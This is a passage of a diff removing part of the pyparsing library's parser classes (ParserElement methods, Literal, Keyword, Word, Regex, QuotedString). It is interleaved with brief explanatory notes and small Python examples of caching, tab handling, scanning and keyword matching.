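    calls.append((lit, loc))          # count real parse attempts
    if text.startswith(lit, loc):
        return loc + len(lit), lit
    raise ParseError("expected %r at %d" % (lit, loc))

text = "ababab"
match_literal("ab", text, 0)
match_literal("ab", text, 0)   # served from cache; no second attempt
assert len(calls) == 1
```

As the docstring warns, this only behaves transparently when parse actions are side-effect free; a cached replay skips any side effects the original attempt performed.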
-
- def parseString( self, instring, parseAll=False ):
- """Execute the parse expression with the given string.
- This is the main interface to the client code, once the complete
- expression has been built.
-
- If you want the grammar to require that the entire input string be
- successfully parsed, then set C{parseAll} to True (equivalent to ending
- the grammar with C{L{StringEnd()}}).
-
- Note: C{parseString} implicitly calls C{expandtabs()} on the input string,
- in order to report proper column numbers in parse actions.
- If the input string contains tabs and
- the grammar uses parse actions that use the C{loc} argument to index into the
- string being parsed, you can ensure you have a consistent view of the input
- string by:
- - calling C{parseWithTabs} on your grammar before calling C{parseString}
- (see L{I{parseWithTabs}})
- - define your parse action using the full C{(s,loc,toks)} signature, and
- reference the input string using the parse action's C{s} argument
- - explicitly expand the tabs in your input string before calling
- C{parseString}
- """
- ParserElement.resetCache()
- if not self.streamlined:
- self.streamline()
- #~ self.saveAsList = True
- for e in self.ignoreExprs:
- e.streamline()
- if not self.keepTabs:
- instring = instring.expandtabs()
- try:
- loc, tokens = self._parse( instring, 0 )
- if parseAll:
- loc = self.preParse( instring, loc )
- se = Empty() + StringEnd()
- se._parse( instring, loc )
- except ParseBaseException as exc:
- if ParserElement.verbose_stacktrace:
- raise
- else:
- # catch and re-raise exception from here, clears out pyparsing internal stack trace
- raise exc
- else:
- return tokens
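The tab-expansion note in the docstring above comes down to a stdlib behavior: a location computed against the expanded string does not index correctly into the raw, tab-containing original. A minimal demonstration:

```python
# parseString expands tabs so that a loc index maps to the column a
# reader would see. The same loc does not index the unexpanded string.
raw = "key:\tvalue"
expanded = raw.expandtabs()   # default tab size is 8

loc = expanded.index("value")
assert expanded[loc:] == "value"
# In the raw string, the same offset lands inside "value":
assert raw[loc:] != "value"
```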
-
- def scanString( self, instring, maxMatches=_MAX_INT, overlap=False ):
- """Scan the input string for expression matches. Each match will return the
- matching tokens, start location, and end location. May be called with optional
- C{maxMatches} argument, to clip scanning after 'n' matches are found. If
- C{overlap} is specified, then overlapping matches will be reported.
-
- Note that the start and end locations are reported relative to the string
- being parsed. See L{I{parseString}} for more information on parsing
- strings with embedded tabs."""
- if not self.streamlined:
- self.streamline()
- for e in self.ignoreExprs:
- e.streamline()
-
- if not self.keepTabs:
- instring = _ustr(instring).expandtabs()
- instrlen = len(instring)
- loc = 0
- preparseFn = self.preParse
- parseFn = self._parse
- ParserElement.resetCache()
- matches = 0
- try:
- while loc <= instrlen and matches < maxMatches:
- try:
- preloc = preparseFn( instring, loc )
- nextLoc,tokens = parseFn( instring, preloc, callPreParse=False )
- except ParseException:
- loc = preloc+1
- else:
- if nextLoc > loc:
- matches += 1
- yield tokens, preloc, nextLoc
- if overlap:
- nextloc = preparseFn( instring, loc )
- if nextloc > loc:
- loc = nextLoc
- else:
- loc += 1
- else:
- loc = nextLoc
- else:
- loc = preloc+1
- except ParseBaseException as exc:
- if ParserElement.verbose_stacktrace:
- raise
- else:
- # catch and re-raise exception from here, clears out pyparsing internal stack trace
- raise exc
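The scanning loop above (try a match at each position, yield it and jump past it, otherwise advance one character) can be sketched with a stdlib `re`-based generator. This is an illustration of the control flow only, not pyparsing's implementation, and `scan` is a hypothetical helper name.

```python
import re

# Sketch of the scanString loop: yield (matched text, start, end) for
# each non-overlapping match, advancing one char past failed positions.
def scan(pattern, instring, max_matches=None):
    regex = re.compile(pattern)
    loc, matches = 0, 0
    while loc <= len(instring) and (max_matches is None or matches < max_matches):
        m = regex.match(instring, loc)
        if m and m.end() > loc:      # require progress, like nextLoc > loc
            matches += 1
            yield m.group(), m.start(), m.end()
            loc = m.end()
        else:
            loc += 1

results = list(scan(r"\d+", "a12b345c"))
assert results == [("12", 1, 3), ("345", 4, 7)]
```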
-
- def transformString( self, instring ):
- """Extension to C{L{scanString}}, to modify matching text with modified tokens that may
- be returned from a parse action. To use C{transformString}, define a grammar and
- attach a parse action to it that modifies the returned token list.
- Invoking C{transformString()} on a target string will then scan for matches,
- and replace the matched text patterns according to the logic in the parse
- action. C{transformString()} returns the resulting transformed string."""
- out = []
- lastE = 0
- # force preservation of s, to minimize unwanted transformation of string, and to
- # keep string locs straight between transformString and scanString
- self.keepTabs = True
- try:
- for t,s,e in self.scanString( instring ):
- out.append( instring[lastE:s] )
- if t:
- if isinstance(t,ParseResults):
- out += t.asList()
- elif isinstance(t,list):
- out += t
- else:
- out.append(t)
- lastE = e
- out.append(instring[lastE:])
- out = [o for o in out if o]
- return "".join(map(_ustr,_flatten(out)))
- except ParseBaseException as exc:
- if ParserElement.verbose_stacktrace:
- raise
- else:
- # catch and re-raise exception from here, clears out pyparsing internal stack trace
- raise exc
-
- def searchString( self, instring, maxMatches=_MAX_INT ):
- """Another extension to C{L{scanString}}, simplifying the access to the tokens found
- to match the given parse expression. May be called with optional
- C{maxMatches} argument, to clip searching after 'n' matches are found.
- """
- try:
- return ParseResults([ t for t,s,e in self.scanString( instring, maxMatches ) ])
- except ParseBaseException as exc:
- if ParserElement.verbose_stacktrace:
- raise
- else:
- # catch and re-raise exception from here, clears out pyparsing internal stack trace
- raise exc
-
- def __add__(self, other ):
- """Implementation of + operator - returns C{L{And}}"""
- if isinstance( other, basestring ):
- other = ParserElement.literalStringClass( other )
- if not isinstance( other, ParserElement ):
- warnings.warn("Cannot combine element of type %s with ParserElement" % type(other),
- SyntaxWarning, stacklevel=2)
- return None
- return And( [ self, other ] )
-
- def __radd__(self, other ):
- """Implementation of + operator when left operand is not a C{L{ParserElement}}"""
- if isinstance( other, basestring ):
- other = ParserElement.literalStringClass( other )
- if not isinstance( other, ParserElement ):
- warnings.warn("Cannot combine element of type %s with ParserElement" % type(other),
- SyntaxWarning, stacklevel=2)
- return None
- return other + self
-
- def __sub__(self, other):
- """Implementation of - operator, returns C{L{And}} with error stop"""
- if isinstance( other, basestring ):
- other = ParserElement.literalStringClass( other )
- if not isinstance( other, ParserElement ):
- warnings.warn("Cannot combine element of type %s with ParserElement" % type(other),
- SyntaxWarning, stacklevel=2)
- return None
- return And( [ self, And._ErrorStop(), other ] )
-
- def __rsub__(self, other ):
- """Implementation of - operator when left operand is not a C{L{ParserElement}}"""
- if isinstance( other, basestring ):
- other = ParserElement.literalStringClass( other )
- if not isinstance( other, ParserElement ):
- warnings.warn("Cannot combine element of type %s with ParserElement" % type(other),
- SyntaxWarning, stacklevel=2)
- return None
- return other - self
-
- def __mul__(self,other):
- """Implementation of * operator, allows use of C{expr * 3} in place of
- C{expr + expr + expr}. Expressions may also be multiplied by a 2-integer
- tuple, similar to C{{min,max}} multipliers in regular expressions. Tuples
- may also include C{None} as in:
- - C{expr*(n,None)} or C{expr*(n,)} is equivalent
- to C{expr*n + L{ZeroOrMore}(expr)}
- (read as "at least n instances of C{expr}")
- - C{expr*(None,n)} is equivalent to C{expr*(0,n)}
- (read as "0 to n instances of C{expr}")
- - C{expr*(None,None)} is equivalent to C{L{ZeroOrMore}(expr)}
- - C{expr*(1,None)} is equivalent to C{L{OneOrMore}(expr)}
-
- Note that C{expr*(None,n)} does not raise an exception if
- more than n exprs exist in the input stream; that is,
- C{expr*(None,n)} does not enforce a maximum number of expr
- occurrences. If this behavior is desired, then write
- C{expr*(None,n) + ~expr}
-
- """
- if isinstance(other,int):
- minElements, optElements = other,0
- elif isinstance(other,tuple):
- other = (other + (None, None))[:2]
- if other[0] is None:
- other = (0, other[1])
- if isinstance(other[0],int) and other[1] is None:
- if other[0] == 0:
- return ZeroOrMore(self)
- if other[0] == 1:
- return OneOrMore(self)
- else:
- return self*other[0] + ZeroOrMore(self)
- elif isinstance(other[0],int) and isinstance(other[1],int):
- minElements, optElements = other
- optElements -= minElements
- else:
- raise TypeError("cannot multiply 'ParserElement' and ('%s','%s') objects", type(other[0]),type(other[1]))
- else:
- raise TypeError("cannot multiply 'ParserElement' and '%s' objects", type(other))
-
- if minElements < 0:
- raise ValueError("cannot multiply ParserElement by negative value")
- if optElements < 0:
- raise ValueError("second tuple value must be greater or equal to first tuple value")
- if minElements == optElements == 0:
- raise ValueError("cannot multiply ParserElement by 0 or (0,0)")
-
- if (optElements):
- def makeOptionalList(n):
- if n>1:
- return Optional(self + makeOptionalList(n-1))
- else:
- return Optional(self)
- if minElements:
- if minElements == 1:
- ret = self + makeOptionalList(optElements)
- else:
- ret = And([self]*minElements) + makeOptionalList(optElements)
- else:
- ret = makeOptionalList(optElements)
- else:
- if minElements == 1:
- ret = self
- else:
- ret = And([self]*minElements)
- return ret
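The multiplier-normalization rules listed in the docstring above can be isolated into a small sketch: pad the tuple with `None` placeholders, then translate them into a concrete minimum count plus an optional-extras count (or an open-ended marker). `normalize_times` is a hypothetical helper, not pyparsing's API.

```python
# Sketch of __mul__'s handling of int and (min, max) multipliers.
def normalize_times(other):
    if isinstance(other, int):
        return other, 0                    # exactly n repetitions
    if isinstance(other, tuple):
        lo, hi = (other + (None, None))[:2]
        if lo is None:
            lo = 0                         # (None, n) means (0, n)
        if hi is None:
            return lo, None                # open-ended: n or more
        return lo, hi - lo                 # minimum plus optional extras
    raise TypeError("cannot multiply by %r" % (other,))

assert normalize_times(3) == (3, 0)
assert normalize_times((2, 5)) == (2, 3)
assert normalize_times((None, 4)) == (0, 4)
assert normalize_times((2,)) == (2, None)
```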
-
- def __rmul__(self, other):
- return self.__mul__(other)
-
- def __or__(self, other ):
- """Implementation of | operator - returns C{L{MatchFirst}}"""
- if isinstance( other, basestring ):
- other = ParserElement.literalStringClass( other )
- if not isinstance( other, ParserElement ):
- warnings.warn("Cannot combine element of type %s with ParserElement" % type(other),
- SyntaxWarning, stacklevel=2)
- return None
- return MatchFirst( [ self, other ] )
-
- def __ror__(self, other ):
- """Implementation of | operator when left operand is not a C{L{ParserElement}}"""
- if isinstance( other, basestring ):
- other = ParserElement.literalStringClass( other )
- if not isinstance( other, ParserElement ):
- warnings.warn("Cannot combine element of type %s with ParserElement" % type(other),
- SyntaxWarning, stacklevel=2)
- return None
- return other | self
-
- def __xor__(self, other ):
- """Implementation of ^ operator - returns C{L{Or}}"""
- if isinstance( other, basestring ):
- other = ParserElement.literalStringClass( other )
- if not isinstance( other, ParserElement ):
- warnings.warn("Cannot combine element of type %s with ParserElement" % type(other),
- SyntaxWarning, stacklevel=2)
- return None
- return Or( [ self, other ] )
-
- def __rxor__(self, other ):
- """Implementation of ^ operator when left operand is not a C{L{ParserElement}}"""
- if isinstance( other, basestring ):
- other = ParserElement.literalStringClass( other )
- if not isinstance( other, ParserElement ):
- warnings.warn("Cannot combine element of type %s with ParserElement" % type(other),
- SyntaxWarning, stacklevel=2)
- return None
- return other ^ self
-
- def __and__(self, other ):
- """Implementation of & operator - returns C{L{Each}}"""
- if isinstance( other, basestring ):
- other = ParserElement.literalStringClass( other )
- if not isinstance( other, ParserElement ):
- warnings.warn("Cannot combine element of type %s with ParserElement" % type(other),
- SyntaxWarning, stacklevel=2)
- return None
- return Each( [ self, other ] )
-
- def __rand__(self, other ):
- """Implementation of & operator when left operand is not a C{L{ParserElement}}"""
- if isinstance( other, basestring ):
- other = ParserElement.literalStringClass( other )
- if not isinstance( other, ParserElement ):
- warnings.warn("Cannot combine element of type %s with ParserElement" % type(other),
- SyntaxWarning, stacklevel=2)
- return None
- return other & self
-
- def __invert__( self ):
- """Implementation of ~ operator - returns C{L{NotAny}}"""
- return NotAny( self )
-
- def __call__(self, name=None):
- """Shortcut for C{L{setResultsName}}, with C{listAllMatches=default}::
- userdata = Word(alphas).setResultsName("name") + Word(nums+"-").setResultsName("socsecno")
- could be written as::
- userdata = Word(alphas)("name") + Word(nums+"-")("socsecno")
-
- If C{name} is given with a trailing C{'*'} character, then C{listAllMatches} will be
- passed as C{True}.
-
- If C{name} is omitted, same as calling C{L{copy}}.
- """
- if name is not None:
- return self.setResultsName(name)
- else:
- return self.copy()
-
- def suppress( self ):
- """Suppresses the output of this C{ParserElement}; useful to keep punctuation from
- cluttering up returned output.
- """
- return Suppress( self )
-
- def leaveWhitespace( self ):
- """Disables the skipping of whitespace before matching the characters in the
- C{ParserElement}'s defined pattern. This is normally only used internally by
- the pyparsing module, but may be needed in some whitespace-sensitive grammars.
- """
- self.skipWhitespace = False
- return self
-
- def setWhitespaceChars( self, chars ):
- """Overrides the default whitespace chars
- """
- self.skipWhitespace = True
- self.whiteChars = chars
- self.copyDefaultWhiteChars = False
- return self
-
- def parseWithTabs( self ):
- """Overrides default behavior to expand C{<TAB>}s to spaces before parsing the input string.
- Must be called before C{parseString} when the input grammar contains elements that
- match C{<TAB>} characters."""
- self.keepTabs = True
- return self
-
- def ignore( self, other ):
- """Define expression to be ignored (e.g., comments) while doing pattern
- matching; may be called repeatedly, to define multiple comment or other
- ignorable patterns.
- """
- if isinstance( other, Suppress ):
- if other not in self.ignoreExprs:
- self.ignoreExprs.append( other.copy() )
- else:
- self.ignoreExprs.append( Suppress( other.copy() ) )
- return self
-
- def setDebugActions( self, startAction, successAction, exceptionAction ):
- """Enable display of debugging messages while doing pattern matching."""
- self.debugActions = (startAction or _defaultStartDebugAction,
- successAction or _defaultSuccessDebugAction,
- exceptionAction or _defaultExceptionDebugAction)
- self.debug = True
- return self
-
- def setDebug( self, flag=True ):
- """Enable display of debugging messages while doing pattern matching.
- Set C{flag} to True to enable, False to disable."""
- if flag:
- self.setDebugActions( _defaultStartDebugAction, _defaultSuccessDebugAction, _defaultExceptionDebugAction )
- else:
- self.debug = False
- return self
-
- def __str__( self ):
- return self.name
-
- def __repr__( self ):
- return _ustr(self)
-
- def streamline( self ):
- self.streamlined = True
- self.strRepr = None
- return self
-
- def checkRecursion( self, parseElementList ):
- pass
-
- def validate( self, validateTrace=[] ):
- """Check defined expressions for valid structure, check for infinite recursive definitions."""
- self.checkRecursion( [] )
-
- def parseFile( self, file_or_filename, parseAll=False ):
- """Execute the parse expression on the given file or filename.
- If a filename is specified (instead of a file object),
- the entire file is opened, read, and closed before parsing.
- """
- try:
- file_contents = file_or_filename.read()
- except AttributeError:
- f = open(file_or_filename, "r")
- file_contents = f.read()
- f.close()
- try:
- return self.parseString(file_contents, parseAll)
- except ParseBaseException as exc:
- if ParserElement.verbose_stacktrace:
- raise
- else:
- # catch and re-raise exception from here, clears out pyparsing internal stack trace
- raise exc
-
- def __eq__(self,other):
- if isinstance(other, ParserElement):
- return self is other or self.__dict__ == other.__dict__
- elif isinstance(other, basestring):
- try:
- self.parseString(_ustr(other), parseAll=True)
- return True
- except ParseBaseException:
- return False
- else:
- return super(ParserElement,self)==other
-
- def __ne__(self,other):
- return not (self == other)
-
- def __hash__(self):
- return hash(id(self))
-
- def __req__(self,other):
- return self == other
-
- def __rne__(self,other):
- return not (self == other)
-
-
-class Token(ParserElement):
- """Abstract C{ParserElement} subclass, for defining atomic matching patterns."""
- def __init__( self ):
- super(Token,self).__init__( savelist=False )
-
- def setName(self, name):
- s = super(Token,self).setName(name)
- self.errmsg = "Expected " + self.name
- return s
-
-
-class Empty(Token):
- """An empty token, will always match."""
- def __init__( self ):
- super(Empty,self).__init__()
- self.name = "Empty"
- self.mayReturnEmpty = True
- self.mayIndexError = False
-
-
-class NoMatch(Token):
- """A token that will never match."""
- def __init__( self ):
- super(NoMatch,self).__init__()
- self.name = "NoMatch"
- self.mayReturnEmpty = True
- self.mayIndexError = False
- self.errmsg = "Unmatchable token"
-
- def parseImpl( self, instring, loc, doActions=True ):
- raise ParseException(instring, loc, self.errmsg, self)
-
-
-class Literal(Token):
- """Token to exactly match a specified string."""
- def __init__( self, matchString ):
- super(Literal,self).__init__()
- self.match = matchString
- self.matchLen = len(matchString)
- try:
- self.firstMatchChar = matchString[0]
- except IndexError:
- warnings.warn("null string passed to Literal; use Empty() instead",
- SyntaxWarning, stacklevel=2)
- self.__class__ = Empty
- self.name = '"%s"' % _ustr(self.match)
- self.errmsg = "Expected " + self.name
- self.mayReturnEmpty = False
- self.mayIndexError = False
-
- # Performance tuning: this routine gets called a *lot*
- # if this is a single character match string and the first character matches,
- # short-circuit as quickly as possible, and avoid calling startswith
- #~ @profile
- def parseImpl( self, instring, loc, doActions=True ):
- if (instring[loc] == self.firstMatchChar and
- (self.matchLen==1 or instring.startswith(self.match,loc)) ):
- return loc+self.matchLen, self.match
- raise ParseException(instring, loc, self.errmsg, self)
-_L = Literal
-ParserElement.literalStringClass = Literal
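The performance comment in `Literal.parseImpl` above relies on `str.startswith` accepting a start offset, which avoids building a slice just to compare:

```python
# str.startswith with an offset compares in place, without slicing.
s = "hello world"
assert s.startswith("world", 6)
assert not s.startswith("world", 0)
```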
-
-class Keyword(Token):
- """Token to exactly match a specified string as a keyword, that is, it must be
- immediately followed by a non-keyword character. Compare with C{L{Literal}}::
- Literal("if") will match the leading C{'if'} in C{'ifAndOnlyIf'}.
- Keyword("if") will not; it will only match the leading C{'if'} in C{'if x=1'}, or C{'if(y==2)'}
- Accepts two optional constructor arguments in addition to the keyword string:
- C{identChars} is a string of characters that would be valid identifier characters,
- defaulting to all alphanumerics + "_" and "$"; C{caseless} allows case-insensitive
- matching, default is C{False}.
- """
- DEFAULT_KEYWORD_CHARS = alphanums+"_$"
-
- def __init__( self, matchString, identChars=DEFAULT_KEYWORD_CHARS, caseless=False ):
- super(Keyword,self).__init__()
- self.match = matchString
- self.matchLen = len(matchString)
- try:
- self.firstMatchChar = matchString[0]
- except IndexError:
- warnings.warn("null string passed to Keyword; use Empty() instead",
- SyntaxWarning, stacklevel=2)
- self.name = '"%s"' % self.match
- self.errmsg = "Expected " + self.name
- self.mayReturnEmpty = False
- self.mayIndexError = False
- self.caseless = caseless
- if caseless:
- self.caselessmatch = matchString.upper()
- identChars = identChars.upper()
- self.identChars = set(identChars)
-
- def parseImpl( self, instring, loc, doActions=True ):
- if self.caseless:
- if ( (instring[ loc:loc+self.matchLen ].upper() == self.caselessmatch) and
- (loc >= len(instring)-self.matchLen or instring[loc+self.matchLen].upper() not in self.identChars) and
- (loc == 0 or instring[loc-1].upper() not in self.identChars) ):
- return loc+self.matchLen, self.match
- else:
- if (instring[loc] == self.firstMatchChar and
- (self.matchLen==1 or instring.startswith(self.match,loc)) and
- (loc >= len(instring)-self.matchLen or instring[loc+self.matchLen] not in self.identChars) and
- (loc == 0 or instring[loc-1] not in self.identChars) ):
- return loc+self.matchLen, self.match
- raise ParseException(instring, loc, self.errmsg, self)
-
- def copy(self):
- c = super(Keyword,self).copy()
- c.identChars = Keyword.DEFAULT_KEYWORD_CHARS
- return c
-
- def setDefaultKeywordChars( chars ):
- """Overrides the default Keyword chars
- """
- Keyword.DEFAULT_KEYWORD_CHARS = chars
- setDefaultKeywordChars = staticmethod(setDefaultKeywordChars)
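The Literal-vs-Keyword distinction from the docstring above can be reproduced with stdlib regexes: a plain substring match accepts `'if'` inside `'ifAndOnlyIf'`, while requiring a non-identifier character on each side does not. This is only an illustrative sketch; `Keyword.parseImpl` checks `identChars` directly rather than using lookarounds.

```python
import re

# Identifier characters matching Keyword's default (alphanumerics, _, $).
ident_chars = r"[A-Za-z0-9_$]"
literal_if = re.compile(r"if")
keyword_if = re.compile(r"(?<!%s)if(?!%s)" % (ident_chars, ident_chars))

assert literal_if.match("ifAndOnlyIf")            # Literal matches
assert keyword_if.match("ifAndOnlyIf") is None    # Keyword does not
assert keyword_if.match("if x=1")
assert keyword_if.match("if(y==2)")
```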
-
-class CaselessLiteral(Literal):
- """Token to match a specified string, ignoring case of letters.
- Note: the matched results will always be in the case of the given
- match string, NOT the case of the input text.
- """
- def __init__( self, matchString ):
- super(CaselessLiteral,self).__init__( matchString.upper() )
- # Preserve the defining literal.
- self.returnString = matchString
- self.name = "'%s'" % self.returnString
- self.errmsg = "Expected " + self.name
-
- def parseImpl( self, instring, loc, doActions=True ):
- if instring[ loc:loc+self.matchLen ].upper() == self.match:
- return loc+self.matchLen, self.returnString
- raise ParseException(instring, loc, self.errmsg, self)
-
-class CaselessKeyword(Keyword):
- def __init__( self, matchString, identChars=Keyword.DEFAULT_KEYWORD_CHARS ):
- super(CaselessKeyword,self).__init__( matchString, identChars, caseless=True )
-
- def parseImpl( self, instring, loc, doActions=True ):
- if ( (instring[ loc:loc+self.matchLen ].upper() == self.caselessmatch) and
- (loc >= len(instring)-self.matchLen or instring[loc+self.matchLen].upper() not in self.identChars) ):
- return loc+self.matchLen, self.match
- raise ParseException(instring, loc, self.errmsg, self)
-
-class Word(Token):
- """Token for matching words composed of allowed character sets.
- Defined with string containing all allowed initial characters,
- an optional string containing allowed body characters (if omitted,
- defaults to the initial character set), and an optional minimum,
- maximum, and/or exact length. The default value for C{min} is 1 (a
- minimum value < 1 is not valid); the default values for C{max} and C{exact}
- are 0, meaning no maximum or exact length restriction. An optional
- C{excludeChars} parameter can list characters that might be found in
- the input C{bodyChars} string; useful to define a word of all printables
- except for one or two characters, for instance.
- """
- def __init__( self, initChars, bodyChars=None, min=1, max=0, exact=0, asKeyword=False, excludeChars=None ):
- super(Word,self).__init__()
- if excludeChars:
- initChars = ''.join(c for c in initChars if c not in excludeChars)
- if bodyChars:
- bodyChars = ''.join(c for c in bodyChars if c not in excludeChars)
- self.initCharsOrig = initChars
- self.initChars = set(initChars)
- if bodyChars :
- self.bodyCharsOrig = bodyChars
- self.bodyChars = set(bodyChars)
- else:
- self.bodyCharsOrig = initChars
- self.bodyChars = set(initChars)
-
- self.maxSpecified = max > 0
-
- if min < 1:
- raise ValueError("cannot specify a minimum length < 1; use Optional(Word()) if zero-length word is permitted")
-
- self.minLen = min
-
- if max > 0:
- self.maxLen = max
- else:
- self.maxLen = _MAX_INT
-
- if exact > 0:
- self.maxLen = exact
- self.minLen = exact
-
- self.name = _ustr(self)
- self.errmsg = "Expected " + self.name
- self.mayIndexError = False
- self.asKeyword = asKeyword
-
- if ' ' not in self.initCharsOrig+self.bodyCharsOrig and (min==1 and max==0 and exact==0):
- if self.bodyCharsOrig == self.initCharsOrig:
- self.reString = "[%s]+" % _escapeRegexRangeChars(self.initCharsOrig)
- elif len(self.bodyCharsOrig) == 1:
- self.reString = "%s[%s]*" % \
- (re.escape(self.initCharsOrig),
- _escapeRegexRangeChars(self.bodyCharsOrig),)
- else:
- self.reString = "[%s][%s]*" % \
- (_escapeRegexRangeChars(self.initCharsOrig),
- _escapeRegexRangeChars(self.bodyCharsOrig),)
- if self.asKeyword:
- self.reString = r"\b"+self.reString+r"\b"
- try:
- self.re = re.compile( self.reString )
- except:
- self.re = None
-
- def parseImpl( self, instring, loc, doActions=True ):
- if self.re:
- result = self.re.match(instring,loc)
- if not result:
- raise ParseException(instring, loc, self.errmsg, self)
-
- loc = result.end()
- return loc, result.group()
-
- if not(instring[ loc ] in self.initChars):
- raise ParseException(instring, loc, self.errmsg, self)
-
- start = loc
- loc += 1
- instrlen = len(instring)
- bodychars = self.bodyChars
- maxloc = start + self.maxLen
- maxloc = min( maxloc, instrlen )
- while loc < maxloc and instring[loc] in bodychars:
- loc += 1
-
- throwException = False
- if loc - start < self.minLen:
- throwException = True
- if self.maxSpecified and loc < instrlen and instring[loc] in bodychars:
- throwException = True
- if self.asKeyword:
- if (start>0 and instring[start-1] in bodychars) or (loc<instrlen and instring[loc] in bodychars):
- throwException = True
-
- if throwException:
- raise ParseException(instring, loc, self.errmsg, self)
-
- return loc, instring[start:loc]
-
- def __str__( self ):
- try:
- return super(Word,self).__str__()
- except:
- pass
-
- if self.strRepr is None:
-
- def charsAsStr(s):
- if len(s)>4:
- return s[:4]+"..."
- else:
- return s
-
- if ( self.initCharsOrig != self.bodyCharsOrig ):
- self.strRepr = "W:(%s,%s)" % ( charsAsStr(self.initCharsOrig), charsAsStr(self.bodyCharsOrig) )
- else:
- self.strRepr = "W:(%s)" % charsAsStr(self.initCharsOrig)
-
- return self.strRepr
-
-
-class Regex(Token):
- """Token for matching strings that match a given regular expression.
- Defined with string specifying the regular expression in a form recognized by the inbuilt Python re module.
- """
- compiledREtype = type(re.compile("[A-Z]"))
- def __init__( self, pattern, flags=0):
- """The parameters C{pattern} and C{flags} are passed to the C{re.compile()} function as-is. See the Python C{re} module for an explanation of the acceptable patterns and flags."""
- super(Regex,self).__init__()
-
- if isinstance(pattern, basestring):
- if len(pattern) == 0:
- warnings.warn("null string passed to Regex; use Empty() instead",
- SyntaxWarning, stacklevel=2)
-
- self.pattern = pattern
- self.flags = flags
-
- try:
- self.re = re.compile(self.pattern, self.flags)
- self.reString = self.pattern
- except sre_constants.error:
- warnings.warn("invalid pattern (%s) passed to Regex" % pattern,
- SyntaxWarning, stacklevel=2)
- raise
-
- elif isinstance(pattern, Regex.compiledREtype):
- self.re = pattern
- self.pattern = \
- self.reString = str(pattern)
- self.flags = flags
-
- else:
- raise ValueError("Regex may only be constructed with a string or a compiled RE object")
-
- self.name = _ustr(self)
- self.errmsg = "Expected " + self.name
- self.mayIndexError = False
- self.mayReturnEmpty = True
-
- def parseImpl( self, instring, loc, doActions=True ):
- result = self.re.match(instring,loc)
- if not result:
- raise ParseException(instring, loc, self.errmsg, self)
-
- loc = result.end()
- d = result.groupdict()
- ret = ParseResults(result.group())
- if d:
- for k in d:
- ret[k] = d[k]
- return loc,ret
-
- def __str__( self ):
- try:
- return super(Regex,self).__str__()
- except:
- pass
-
- if self.strRepr is None:
- self.strRepr = "Re:(%s)" % repr(self.pattern)
-
- return self.strRepr
-
-
-class QuotedString(Token):
- """Token for matching strings that are delimited by quoting characters.
- """
- def __init__( self, quoteChar, escChar=None, escQuote=None, multiline=False, unquoteResults=True, endQuoteChar=None):
- """
- Defined with the following parameters:
- - quoteChar - string of one or more characters defining the quote delimiting string
- - escChar - character to escape quotes, typically backslash (default=None)
- - escQuote - special quote sequence to escape an embedded quote string (such as SQL's "" to escape an embedded ") (default=None)
- - multiline - boolean indicating whether quotes can span multiple lines (default=C{False})
- - unquoteResults - boolean indicating whether the matched text should be unquoted (default=C{True})
- - endQuoteChar - string of one or more characters defining the end of the quote delimited string (default=C{None} => same as quoteChar)
- """
- super(QuotedString,self).__init__()
-
- # remove white space from quote chars - wont work anyway
- quoteChar = quoteChar.strip()
- if len(quoteChar) == 0:
- warnings.warn("quoteChar cannot be the empty string",SyntaxWarning,stacklevel=2)
- raise SyntaxError()
-
- if endQuoteChar is None:
- endQuoteChar = quoteChar
- else:
- endQuoteChar = endQuoteChar.strip()
- if len(endQuoteChar) == 0:
- warnings.warn("endQuoteChar cannot be the empty string",SyntaxWarning,stacklevel=2)
- raise SyntaxError()
-
- self.quoteChar = quoteChar
- self.quoteCharLen = len(quoteChar)
- self.firstQuoteChar = quoteChar[0]
- self.endQuoteChar = endQuoteChar
- self.endQuoteCharLen = len(endQuoteChar)
- self.escChar = escChar
- self.escQuote = escQuote
- self.unquoteResults = unquoteResults
-
- if multiline:
- self.flags = re.MULTILINE | re.DOTALL
- self.pattern = r'%s(?:[^%s%s]' % \
- ( re.escape(self.quoteChar),
- _escapeRegexRangeChars(self.endQuoteChar[0]),
- (escChar is not None and _escapeRegexRangeChars(escChar) or '') )
- else:
- self.flags = 0
- self.pattern = r'%s(?:[^%s\n\r%s]' % \
- ( re.escape(self.quoteChar),
- _escapeRegexRangeChars(self.endQuoteChar[0]),
- (escChar is not None and _escapeRegexRangeChars(escChar) or '') )
- if len(self.endQuoteChar) > 1:
- self.pattern += (
- '|(?:' + ')|(?:'.join("%s[^%s]" % (re.escape(self.endQuoteChar[:i]),
- _escapeRegexRangeChars(self.endQuoteChar[i]))
- for i in range(len(self.endQuoteChar)-1,0,-1)) + ')'
- )
- if escQuote:
- self.pattern += (r'|(?:%s)' % re.escape(escQuote))
- if escChar:
- self.pattern += (r'|(?:%s.)' % re.escape(escChar))
- self.escCharReplacePattern = re.escape(self.escChar)+"(.)"
- self.pattern += (r')*%s' % re.escape(self.endQuoteChar))
-
- try:
- self.re = re.compile(self.pattern, self.flags)
- self.reString = self.pattern
- except sre_constants.error:
- warnings.warn("invalid pattern (%s) passed to Regex" % self.pattern,
- SyntaxWarning, stacklevel=2)
- raise
-
- self.name = _ustr(self)
- self.errmsg = "Expected " + self.name
- self.mayIndexError = False
- self.mayReturnEmpty = True
-
- def parseImpl( self, instring, loc, doActions=True ):
- result = instring[loc] == self.firstQuoteChar and self.re.match(instring,loc) or None
- if not result:
- raise ParseException(instring, loc, self.errmsg, self)
-
- loc = result.end()
- ret = result.group()
-
- if self.unquoteResults:
-
- # strip off quotes
- ret = ret[self.quoteCharLen:-self.endQuoteCharLen]
-
- if isinstance(ret,basestring):
- # replace escaped characters
- if self.escChar:
- ret = re.sub(self.escCharReplacePattern,"\g<1>",ret)
-
- # replace escaped quotes
- if self.escQuote:
- ret = ret.replace(self.escQuote, self.endQuoteChar)
-
- return loc, ret
-
- def __str__( self ):
- try:
- return super(QuotedString,self).__str__()
- except:
- pass
-
- if self.strRepr is None:
- self.strRepr = "quoted string, starting with %s ending with %s" % (self.quoteChar, self.endQuoteChar)
-
- return self.strRepr
-
-
-class CharsNotIn(Token):
- """Token for matching words composed of characters *not* in a given set.
- Defined with string containing all disallowed characters, and an optional
- minimum, maximum, and/or exact length. The default value for C{min} is 1 (a
- minimum value < 1 is not valid); the default values for C{max} and C{exact}
- are 0, meaning no maximum or exact length restriction.
- """
- def __init__( self, notChars, min=1, max=0, exact=0 ):
- super(CharsNotIn,self).__init__()
- self.skipWhitespace = False
- self.notChars = notChars
-
- if min < 1:
- raise ValueError("cannot specify a minimum length < 1; use Optional(CharsNotIn()) if zero-length char group is permitted")
-
- self.minLen = min
-
- if max > 0:
- self.maxLen = max
- else:
- self.maxLen = _MAX_INT
-
